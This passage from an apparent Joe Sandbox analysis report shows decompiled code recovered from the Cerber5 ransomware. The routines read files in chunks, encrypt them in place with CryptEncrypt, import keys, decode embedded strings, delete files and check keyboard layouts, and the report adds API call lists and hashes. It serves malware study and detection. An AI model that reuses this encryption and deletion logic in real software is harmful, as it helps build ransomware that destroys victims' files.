                                                                                                                                                                                        • Instruction Fuzzy Hash: F4C19FB2D00218BFDB10AFA5DD45AAEBBB8EF48311F10457AF601F72E1DB7849058B59
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 62%
                                                                                                                                                                                        			E0040B283(void* __ecx, void* __eflags, intOrPtr _a4, void* _a8, char _a12) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _v16;
                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                        				signed int _v24;
                                                                                                                                                                                        				int _v28;
                                                                                                                                                                                        				intOrPtr _v32;
                                                                                                                                                                                        				signed int _v36;
                                                                                                                                                                                        				signed int _v40;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				signed int _t64;
                                                                                                                                                                                        				signed int _t66;
                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                        				intOrPtr _t71;
                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                        				char _t75;
                                                                                                                                                                                        				intOrPtr* _t79;
                                                                                                                                                                                        				intOrPtr* _t86;
                                                                                                                                                                                        				int _t87;
                                                                                                                                                                                        				void* _t88;
                                                                                                                                                                                        				void* _t93;
                                                                                                                                                                                        				void* _t95;
                                                                                                                                                                                        				signed int _t97;
                                                                                                                                                                                        				char _t98;
                                                                                                                                                                                        				char _t99;
                                                                                                                                                                                        				signed int _t101;
                                                                                                                                                                                        				intOrPtr _t104;
                                                                                                                                                                                        				signed int _t105;
                                                                                                                                                                                        				void* _t108;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t1 =  &_a12; // 0x402a28
                                                                                                                                                                                        				_t105 = E0040B146(__ecx, _a4);
                                                                                                                                                                                        				_t64 =  *( *_t1);
                                                                                                                                                                                        				_t3 = _t105 - 0xb; // -11
                                                                                                                                                                                        				_t87 = _t3;
                                                                                                                                                                                        				_t97 = _t64 % _t87;
                                                                                                                                                                                        				_t92 = 0 | _t97 != 0x00000000;
                                                                                                                                                                                        				_v36 = _t97;
                                                                                                                                                                                        				_t101 = _t64 / _t87 + (_t97 != 0);
                                                                                                                                                                                        				_v28 = _t101;
                                                                                                                                                                                        				_v40 = _t101 * _t105;
                                                                                                                                                                                        				_t66 = E004053BD(_t97 != 0);
                                                                                                                                                                                        				_v20 = _t66;
                                                                                                                                                                                        				if(_t66 != 0) {
                                                                                                                                                                                        					_t68 = E004053BD(_t92);
                                                                                                                                                                                        					_v12 = _t68;
                                                                                                                                                                                        					if(_t68 != 0) {
                                                                                                                                                                                        						_v24 = _v24 & 0x00000000;
                                                                                                                                                                                        						_t19 =  &_v20; // 0x402a28
                                                                                                                                                                                        						_t104 =  *_t19;
                                                                                                                                                                                        						_v16 = _a8;
                                                                                                                                                                                        						_t71 = _v28 - 1;
                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                        						_v32 = _t71;
                                                                                                                                                                                        						if(_t71 == 0) {
                                                                                                                                                                                        							L8:
                                                                                                                                                                                        							_t72 = _v36;
                                                                                                                                                                                        							_v24 = _t72;
                                                                                                                                                                                        							if(_t72 == 0) {
                                                                                                                                                                                        								_v24 = _t87;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							memcpy(_v12, _v16, _v24);
                                                                                                                                                                                        							_t88 = _v12;
                                                                                                                                                                                        							_t75 =  *0x40fa50(_a4, 0, 1, 0, _t88,  &_v24, _t105);
                                                                                                                                                                                        							if(_t75 == 0) {
                                                                                                                                                                                        								_v5 = _t75;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t93 = 0;
                                                                                                                                                                                        							if(_t105 != 0) {
                                                                                                                                                                                        								_t52 = _t88 - 1; // -1
                                                                                                                                                                                        								_t79 = _t105 + _t52;
                                                                                                                                                                                        								do {
                                                                                                                                                                                        									_t98 =  *_t79;
                                                                                                                                                                                        									_t79 = _t79 - 1;
                                                                                                                                                                                        									 *((char*)(_t93 + _t104)) = _t98;
                                                                                                                                                                                        									_t93 = _t93 + 1;
                                                                                                                                                                                        								} while (_t93 < _t105);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							if(_v5 != 0) {
                                                                                                                                                                                        								_t60 =  &_a12; // 0x402a28
                                                                                                                                                                                        								 *( *_t60) = _v40;
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								goto L16;
                                                                                                                                                                                        							}
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							while(1) {
                                                                                                                                                                                        								_v28 = _t87;
                                                                                                                                                                                        								memcpy(_v12, _v16, _t87);
                                                                                                                                                                                        								_t108 = _t108 + 0xc;
                                                                                                                                                                                        								 *0x40fa50(_a4, 0, 0, 0, _v12,  &_v28, _t105);
                                                                                                                                                                                        								if(0 == 0) {
                                                                                                                                                                                        									break;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t95 = 0;
                                                                                                                                                                                        								if(_t105 != 0) {
                                                                                                                                                                                        									_t32 = _v12 - 1; // -1
                                                                                                                                                                                        									_t86 = _t105 + _t32;
                                                                                                                                                                                        									do {
                                                                                                                                                                                        										_t99 =  *_t86;
                                                                                                                                                                                        										_t86 = _t86 - 1;
                                                                                                                                                                                        										 *((char*)(_t95 + _t104)) = _t99;
                                                                                                                                                                                        										_t95 = _t95 + 1;
                                                                                                                                                                                        									} while (_t95 < _t105);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t104 = _t104 + _v28;
                                                                                                                                                                                        								_v16 = _v16 + _t87;
                                                                                                                                                                                        								_v24 = _v24 + 1;
                                                                                                                                                                                        								if(_v24 < _v32) {
                                                                                                                                                                                        									continue;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									goto L8;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L18;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							L16:
                                                                                                                                                                                        							_t55 =  &_v20; // 0x402a28
                                                                                                                                                                                        							E00405463( *_t55);
                                                                                                                                                                                        							E00405463(_v12);
                                                                                                                                                                                        							_v20 = _v20 & 0x00000000;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				L18:
                                                                                                                                                                                        				_t61 =  &_v20; // 0x402a28
                                                                                                                                                                                        				return  *_t61;
                                                                                                                                                                                        			}
































                                                                                                                                                                                        0x0040b35a
                                                                                                                                                                                        0x0040b366
                                                                                                                                                                                        0x0040b36b
                                                                                                                                                                                        0x0040b380
                                                                                                                                                                                        0x0040b388
                                                                                                                                                                                        0x0040b38a
                                                                                                                                                                                        0x0040b38a
                                                                                                                                                                                        0x0040b38d
                                                                                                                                                                                        0x0040b391
                                                                                                                                                                                        0x0040b393
                                                                                                                                                                                        0x0040b393
                                                                                                                                                                                        0x0040b397
                                                                                                                                                                                        0x0040b397
                                                                                                                                                                                        0x0040b399
                                                                                                                                                                                        0x0040b39a
                                                                                                                                                                                        0x0040b39d
                                                                                                                                                                                        0x0040b39e
                                                                                                                                                                                        0x0040b397
                                                                                                                                                                                        0x0040b3a6
                                                                                                                                                                                        0x0040b3c1
                                                                                                                                                                                        0x0040b3c4
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040b2f7
                                                                                                                                                                                        0x0040b2f7
                                                                                                                                                                                        0x0040b2fb
                                                                                                                                                                                        0x0040b301
                                                                                                                                                                                        0x0040b306
                                                                                                                                                                                        0x0040b319
                                                                                                                                                                                        0x0040b321
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040b327
                                                                                                                                                                                        0x0040b32b
                                                                                                                                                                                        0x0040b330
                                                                                                                                                                                        0x0040b330
                                                                                                                                                                                        0x0040b334
                                                                                                                                                                                        0x0040b334
                                                                                                                                                                                        0x0040b336
                                                                                                                                                                                        0x0040b337
                                                                                                                                                                                        0x0040b33a
                                                                                                                                                                                        0x0040b33b
                                                                                                                                                                                        0x0040b334
                                                                                                                                                                                        0x0040b33f
                                                                                                                                                                                        0x0040b342
                                                                                                                                                                                        0x0040b345
                                                                                                                                                                                        0x0040b34e
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x0040b34e
                                                                                                                                                                                        0x0040b3a8
                                                                                                                                                                                        0x0040b3a8
                                                                                                                                                                                        0x0040b3ab
                                                                                                                                                                                        0x0040b3b3
                                                                                                                                                                                        0x0040b3b8
                                                                                                                                                                                        0x0040b3b8
                                                                                                                                                                                        0x0040b2f5
                                                                                                                                                                                        0x0040b2d7
                                                                                                                                                                                        0x0040b3c6
                                                                                                                                                                                        0x0040b3c6
                                                                                                                                                                                        0x0040b3cd

                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040B146: CryptGetKeyParam.ADVAPI32(?,00000009,004029D6,?,00000000,0040D17C,004029D6,004029D6,?,0040273B,00000000,80C426C8,?,00000000), ref: 0040B166
                                                                                                                                                                                        • memcpy.NTDLL(00000000,00000000,-0000000B,80C426C8,00000000,?), ref: 0040B301
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,80C426C8,00000000,?), ref: 0040B319
                                                                                                                                                                                        • memcpy.NTDLL(00000000,00000000,00000000,80C426C8,00000000,?), ref: 0040B366
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,80C426C8,00000000,?), ref: 0040B380
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Crypt$Encryptmemcpy$Param
                                                                                                                                                                                        • String ID: (*@$(*@
                                                                                                                                                                                        • API String ID: 673012589-2671997973
                                                                                                                                                                                        • Opcode ID: 35c1e2850f4d88c7f96264c3ccc4014cce949d9499f9bceb127627fd9100d7d6
                                                                                                                                                                                        • Instruction ID: 54093158f1a825de50d9d814c6b244fb5fab6a3abbe75fd9e2e92e6b8b7ee4fc
                                                                                                                                                                                        • Opcode Fuzzy Hash: 35c1e2850f4d88c7f96264c3ccc4014cce949d9499f9bceb127627fd9100d7d6
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D415771D0020AAFDF11DFA5C881AEFBBB9EF44704F24407AE801B7291D7359E458BA8
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 56%
                                                                                                                                                                                        			E0040194B(void* _a4, intOrPtr _a8, intOrPtr _a12, void* _a16, intOrPtr _a20, union _LARGE_INTEGER _a24, union _LARGE_INTEGER* _a28) {
                                                                                                                                                                                        				struct _OVERLAPPED* _v5;
                                                                                                                                                                                        				signed char _v12;
                                                                                                                                                                                        				char _v16;
                                                                                                                                                                                        				char _v20;
                                                                                                                                                                                        				long* _v24;
                                                                                                                                                                                        				long _v28;
                                                                                                                                                                                        				long _v32;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				long* _t44;
                                                                                                                                                                                        				struct _OVERLAPPED* _t62;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				intOrPtr _t68;
                                                                                                                                                                                        				intOrPtr _t70;
                                                                                                                                                                                        				long _t71;
                                                                                                                                                                                        				void* _t72;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t62 = 0;
                                                                                                                                                                                        				_t44 = E0040AF8D( *0x42f7a4 & 0x0000ffff, _a8);
                                                                                                                                                                                        				_pop(_t63);
                                                                                                                                                                                        				_v24 = _t44;
                                                                                                                                                                                        				if(_t44 == 0) {
                                                                                                                                                                                        					L9:
                                                                                                                                                                                        					return _t62;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t68 = _a12;
                                                                                                                                                                                        				_v20 = 0;
                                                                                                                                                                                        				_v16 = 0;
                                                                                                                                                                                        				_v5 = 1;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				while(_t68 != _t62) {
                                                                                                                                                                                        					_t70 =  *0x42f7d8; // 0x40000
                                                                                                                                                                                        					_v12 = _v12 + 1;
                                                                                                                                                                                        					_push(_t62);
                                                                                                                                                                                        					_t71 =  <  ? _t68 : _t70;
                                                                                                                                                                                        					_t68 = _t68 - _t71;
                                                                                                                                                                                        					SetFilePointerEx(_a4, _a24.LowPart, _a28, _t62);
                                                                                                                                                                                        					ReadFile(_a4, _a16, _t71,  &_v32, _t62);
                                                                                                                                                                                        					E0040ADF6(_t63, _a16,  &_v20,  &_v16, _t71);
                                                                                                                                                                                        					_t72 = _t72 + 0xc;
                                                                                                                                                                                        					_push(_t71);
                                                                                                                                                                                        					_push( &_v28);
                                                                                                                                                                                        					_push(_a16);
                                                                                                                                                                                        					_push(_t62);
                                                                                                                                                                                        					_v28 = _t71;
                                                                                                                                                                                        					_push(0 | _t68 == _t62);
                                                                                                                                                                                        					_push(_t62);
                                                                                                                                                                                        					_push(_v24);
                                                                                                                                                                                        					if( *0x40fa50() == 0) {
                                                                                                                                                                                        						_v5 = _t62;
                                                                                                                                                                                        						L8:
                                                                                                                                                                                        						 *((intOrPtr*)(_a20 + 4)) = E0040AEED(_v16, _v20, _a12);
                                                                                                                                                                                        						CryptDestroyKey(_v24);
                                                                                                                                                                                        						_t62 = _v5;
                                                                                                                                                                                        						goto L9;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_push(_t62);
                                                                                                                                                                                        					SetFilePointerEx(_a4, _a24.LowPart, _a28, _t62);
                                                                                                                                                                                        					WriteFile(_a4, _a16, _t71,  &_v32, _t62);
                                                                                                                                                                                        					_a24.LowPart = _a24 + _t71;
                                                                                                                                                                                        					asm("adc [ebp+0x20], ebx");
                                                                                                                                                                                        					if((_v12 & 0x00000001) == 0) {
                                                                                                                                                                                        						Sleep(1);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				goto L8;
                                                                                                                                                                                        			}



















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 0040AF8D: memcpy.NTDLL(?,?,00000010,0001A2AC), ref: 0040AFC6
                                                                                                                                                                                          • Part of subcall function 0040AF8D: CryptImportKey.ADVAPI32(00000208,0000001C,00000000,00000000,00000000,?,?,0001A2AC), ref: 0040AFE2
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 004019A1
                                                                                                                                                                                        • ReadFile.KERNEL32(00000000,00040000,00040000,?,00000000), ref: 004019B3
                                                                                                                                                                                        • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,?,?,00040000), ref: 004019E5
                                                                                                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 004019FA
                                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,00040000,?,00000000), ref: 00401A0C
                                                                                                                                                                                        • Sleep.KERNEL32(00000001), ref: 00401A20
                                                                                                                                                                                        • CryptDestroyKey.ADVAPI32(?), ref: 00401A4B
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: File$Crypt$Pointer$DestroyEncryptImportReadSleepWritememcpy
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1821214037-0
                                                                                                                                                                                        • Opcode ID: 584aa682ed8e0e52711135a3264aa759251664396659cda2042a4cbfd36ba68c
                                                                                                                                                                                        • Instruction ID: 18c608ade0755fad8d0103536e9642e00f749d4286a3dbf0ab3fd0c468255ba2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 584aa682ed8e0e52711135a3264aa759251664396659cda2042a4cbfd36ba68c
                                                                                                                                                                                        • Instruction Fuzzy Hash: B63134B290121AAFCF119FA4DD849EF7F79EF48304F00407AF905A2161D7368A69DFA5
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                        			E00401000(void* __ebx, char* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                        				char* _t40;
                                                                                                                                                                                        				int _t49;
                                                                                                                                                                                        				char* _t50;
                                                                                                                                                                                        				char* _t51;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        				int _t53;
                                                                                                                                                                                        				char* _t59;
                                                                                                                                                                                        				int _t61;
                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                        				void* _t64;
                                                                                                                                                                                        
                                                                                                                                                                                        				E0040B654(__ebx, __edi, __esi);
                                                                                                                                                                                        				_t59 = __ecx;
                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 0x28)) = 0;
                                                                                                                                                                                        				 *(_t62 - 4) = 0;
                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 0x1c)) =  *0x40f19c(__ecx, 0x40da98, 0x68);
                                                                                                                                                                                        				 *(_t62 - 0x24) = __ecx;
                                                                                                                                                                                        				_t40 = E00405905(0x40cea8, 4, 0x9946767a);
                                                                                                                                                                                        				_t64 = _t63 + 0xc;
                                                                                                                                                                                        				 *(_t62 - 0x30) = _t40;
                                                                                                                                                                                        				 *(_t62 - 0x20) =  *(_t62 + 8);
                                                                                                                                                                                        				while( *((intOrPtr*)(_t62 - 0x1c)) != 0) {
                                                                                                                                                                                        					if( *_t59 != 0x2d) {
                                                                                                                                                                                        						L5:
                                                                                                                                                                                        						 *(_t62 - 0x78) = 0;
                                                                                                                                                                                        						memset(_t62 - 0x77, 0, 0x40);
                                                                                                                                                                                        						_t64 = _t64 + 0xc;
                                                                                                                                                                                        						_t61 = 0;
                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                        							 *(_t62 - 0x34) = _t61;
                                                                                                                                                                                        							if( *((intOrPtr*)(_t62 - 0x1c)) == 0 || _t61 >= 0x40) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t53 = StrSpnA(_t59,  *(_t62 - 0x30));
                                                                                                                                                                                        							_t59 =  &(_t59[_t53]);
                                                                                                                                                                                        							 *(_t62 - 0x24) = _t59;
                                                                                                                                                                                        							_t18 = _t62 - 0x1c;
                                                                                                                                                                                        							 *_t18 =  *((intOrPtr*)(_t62 - 0x1c)) - _t53;
                                                                                                                                                                                        							if( *_t18 == 0) {
                                                                                                                                                                                        								break;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							 *((char*)(_t62 + _t61 - 0x78)) =  *_t59;
                                                                                                                                                                                        							_t61 = _t61 + 1;
                                                                                                                                                                                        							_t59 =  &(_t59[1]);
                                                                                                                                                                                        							 *(_t62 - 0x24) = _t59;
                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 0x1c)) =  *((intOrPtr*)(_t62 - 0x1c)) - 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(_t61 == 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						 *(_t62 - 0x2c) = _t61;
                                                                                                                                                                                        						if(CryptStringToBinaryA(_t62 - 0x78, _t61, 1,  *(_t62 - 0x20), _t62 - 0x2c, 0, 0) == 0) {
                                                                                                                                                                                        							break;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t49 =  *(_t62 - 0x2c);
                                                                                                                                                                                        						 *((intOrPtr*)(_t62 - 0x28)) =  *((intOrPtr*)(_t62 - 0x28)) + _t49;
                                                                                                                                                                                        						if( *(_t62 - 0x20) != 0) {
                                                                                                                                                                                        							 *(_t62 - 0x20) =  &(( *(_t62 - 0x20))[_t49]);
                                                                                                                                                                                        						}
                                                                                                                                                                                        						continue;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t50 = E00405905(0x40ceb0, 2, 0x1d2258b8);
                                                                                                                                                                                        					_t64 = _t64 + 0xc;
                                                                                                                                                                                        					_t51 = StrPBrkA(_t59, _t50);
                                                                                                                                                                                        					if(_t51 == 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t52 = _t51 - _t59;
                                                                                                                                                                                        					_t59 =  &(_t59[_t52]);
                                                                                                                                                                                        					 *(_t62 - 0x24) = _t59;
                                                                                                                                                                                        					 *((intOrPtr*)(_t62 - 0x1c)) =  *((intOrPtr*)(_t62 - 0x1c)) - _t52;
                                                                                                                                                                                        					goto L5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				 *(_t62 - 4) =  *(_t62 - 4) | 0xffffffff;
                                                                                                                                                                                        				return E0040B68F( *((intOrPtr*)(_t62 - 0x28)));
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • lstrlen.KERNEL32(?,0040DA98,00000068,00401114,00000000,0040113B,00000000,00000000,00000000,0040279F,00000000,00000000,004029D6,0042F7C8,0040D17C,80C426C8), ref: 00401017
                                                                                                                                                                                        • StrPBrkA.SHLWAPI(?,00000000,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 00401064
                                                                                                                                                                                        • memset.NTDLL ref: 00401086
                                                                                                                                                                                        • StrSpnA.SHLWAPI(?,?,?,?,00000000,?,?,?,?,?,?,00000000,?,004029D6,00000000,00000000), ref: 004010A1
                                                                                                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 004010D8
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: BinaryCryptStringlstrlenmemset
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3810766292-0
                                                                                                                                                                                        • Opcode ID: d2d57c75055eba212e5582ad92216dc63a201ea289f7c5d0449508caca77eff6
                                                                                                                                                                                        • Instruction ID: c7d5595ef341d99572007a40d8366c5632a506f8eb375d6286f033b694829096
                                                                                                                                                                                        • Opcode Fuzzy Hash: d2d57c75055eba212e5582ad92216dc63a201ea289f7c5d0449508caca77eff6
                                                                                                                                                                                        • Instruction Fuzzy Hash: C9314BB1C00259AFDF209FF98884AEEBBB4AF48350F14453BF651B6291D33849808F69
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        APIs
                                                                                                                                                                                        • SearchPathW.KERNEL32(00000000,00404E95,00000000,00000208,?,00000000,00000000), ref: 00404E02
                                                                                                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 00404E19
                                                                                                                                                                                        • NtDeleteFile.NTDLL(?), ref: 00404E44
                                                                                                                                                                                        • RtlFreeAnsiString.NTDLL(?), ref: 00404E53
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000013.00000002.406304332.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                        • Associated: 00000013.00000002.406431625.000000000042F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000013.00000002.406439872.0000000000432000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_19_2_400000_Endermanch@Cerber5.jbxd
                                                                                                                                                                                        Yara matches
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Path$AnsiDeleteFileFreeNameName_SearchString
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 2886153233-0
                                                                                                                                                                                        • Opcode ID: 3ce07c78c49e422613c4546a06f64b52d1355eee0c1d26ab8c1d85b0072b697d
                                                                                                                                                                                        • Instruction ID: 971f7049e0bf6f074288626a8879415b8312df22cfafa15f3008a757f98ac60a
                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ce07c78c49e422613c4546a06f64b52d1355eee0c1d26ab8c1d85b0072b697d
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2401ECF690020CAFEB11EFA5CD85EDFB7BCBB04304F40457AA615F2151DB399A488BA4
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                        			E00408000(void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                        				short _t41;
                                                                                                                                                                                        				signed int _t42;
                                                                                                                                                                                        				void* _t43;
                                                                                                                                                                                        				signed int _t45;
                                                                                                                                                                                        				signed int _t48;
                                                                                                                                                                                        				HKL* _t51;
                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                        				void* _t54;
                                                                                                                                                                                        				int _t55;
                                                                                                                                                                                        				signed int _t57;
                                                                                                                                                                                        				signed int _t60;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                        				_t54 = E004031AF(_a4, __eflags, E00405905( &E0040D668, 9, 0x9c36dbf2));
                                                                                                                                                                                        				_pop(_t44);
                                                                                                                                                                                        				_t67 = _t54;
                                                                                                                                                                                        				if(_t54 != 0) {
                                                                                                                                                                                        					_t43 = E004031AF(_t54, _t67, E00405905(0x40d674, 9, 0xb24dc829));
                                                                                                                                                                                        					_pop(_t44);
                                                                                                                                                                                        					_t68 = _t43;
                                                                                                                                                                                        					if(_t43 != 0) {
                                                                                                                                                                                        						_t60 = E00403156(_t43, _t68);
                                                                                                                                                                                        						_v12 = _t60;
                                                                                                                                                                                        						_t39 = E004053B4(_t44);
                                                                                                                                                                                        						_t53 = 0;
                                                                                                                                                                                        						_v16 = _t39;
                                                                                                                                                                                        						_t69 = _t60;
                                                                                                                                                                                        						if(_t60 != 0) {
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t41 = E00403253(E0040317B(_t43, _t69, _t53), _t69);
                                                                                                                                                                                        								_t44 = _v16;
                                                                                                                                                                                        								 *((short*)(_v16 + _t53 * 2)) = _t41;
                                                                                                                                                                                        								_t53 = _t53 + 1;
                                                                                                                                                                                        							} while (_t53 < _v12);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t42 = 0;
                                                                                                                                                                                        				_t55 = GetKeyboardLayoutList(0, 0);
                                                                                                                                                                                        				if(_t55 != 0) {
                                                                                                                                                                                        					_t51 = E004053BD(_t44);
                                                                                                                                                                                        					if(_t51 != 0) {
                                                                                                                                                                                        						_v5 = 0;
                                                                                                                                                                                        						_t33 = GetKeyboardLayoutList(_t55, _t51);
                                                                                                                                                                                        						_t57 = 0;
                                                                                                                                                                                        						if(_t33 != 0) {
                                                                                                                                                                                        							do {
                                                                                                                                                                                        								_t48 = 0;
                                                                                                                                                                                        								if(_v12 <= 0) {
                                                                                                                                                                                        									goto L11;
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t45 = _t51[_t57] & 0x0000ffff;
                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                        										_t42 = _v16;
                                                                                                                                                                                        										if(_t45 ==  *((intOrPtr*)(_t42 + _t48 * 2))) {
                                                                                                                                                                                        											break;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										_t48 = _t48 + 1;
                                                                                                                                                                                        										if(_t48 < _v12) {
                                                                                                                                                                                        											continue;
                                                                                                                                                                                        										} else {
                                                                                                                                                                                        											goto L11;
                                                                                                                                                                                        										}
                                                                                                                                                                                        										goto L14;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_v5 = 1;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                        								L11:
                                                                                                                                                                                        								_t57 = _t57 + 1;
                                                                                                                                                                                        							} while (_t57 < _t33);
